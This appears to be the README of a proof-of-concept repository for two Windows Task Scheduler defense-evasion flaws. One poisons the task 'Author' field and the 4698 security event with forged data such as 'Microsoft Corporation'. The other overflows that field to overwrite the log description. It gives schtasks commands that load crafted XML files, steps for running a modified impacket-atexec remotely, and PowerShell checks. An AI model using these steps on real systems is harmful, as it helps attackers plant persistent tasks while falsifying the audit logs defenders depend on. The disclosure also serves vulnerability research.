By Ruben Enkaoua and Cymulate
Original Blog: Task Scheduler New Vulnerabilities
Two new Defense Evasion techniques have been discovered.
The first vulnerability is affecting the Task metadatas and the Event Log 4698 "Task Created", allowing an attacker to create a task based on an XML file and poison the "Author" entry to arbitrary data.
The second vulnerability allows to leverage an unlimited allocated buffer in "Author" task metadata, which is handled further by the Windows Event Log, overwriting the whole log description.
The exploit can also be triggered remotely by patching the author entry in the XML file sent over RPC in impacket-atexec.
- Batch Logon rights on the Task Principal for the task to run (Otherwise the metadata / event log is poisoned / overwritten but the task won't run)
- The password of the task principal, if the user creating the task is not admin or doesn't have SeImpersonate privileges
- The Security Policy "Audit Other Object Access Events" is enabled
Remote
# Change the original impacket-atexec script with the uploaded script, and run it with the original arguments
# In order to poison the log with a fake Author entry, change the buffer in the XML file to the desired data. Example: Microsoft Corporation.
impacket-atexec [[domain/]username[:password]@]<targetName or address> commandTask Poisoning (Metadata / Event Log)
# Run the script to check if the INJECTED-DATA author name has been set in the task description
schtasks /create /tn poc /xml poc-poisoning.xml /ru <username> /rp <password> /f
# Check if the data has been injected by querying the task. If the author name is INJECTED-DATA the target is vulnerable
schtasks /query /tn poc /xml | findstr /i authorTask Event Log Overflow
# Run the script to check if the +3500 bytes payload has been injected in the 4698 Event Log
# If the Log Type is not activated on your machine and you still want to test it, activate it in:
# Local Security Policy -> Advanced Audit Policy Configuration -> System Audit Policies - Local Group Policy Object -> Object Access -> Audit Other Object Access Events -> Select Success
schtasks /create /tn poc /xml poc-overflow.xml /ru <username> /rp <password> /fLog Check
# Check the task log by running the following powershell command. If the <RegistrationInfo> tag is containing a 3500 bytes buffer but not the command executed and the arguments, the target is vulnerable.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698} | Where-Object { $_.Message -like '*poc*' } | Select-Object -First 1 | Format-List TimeCreated, MessageThis code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.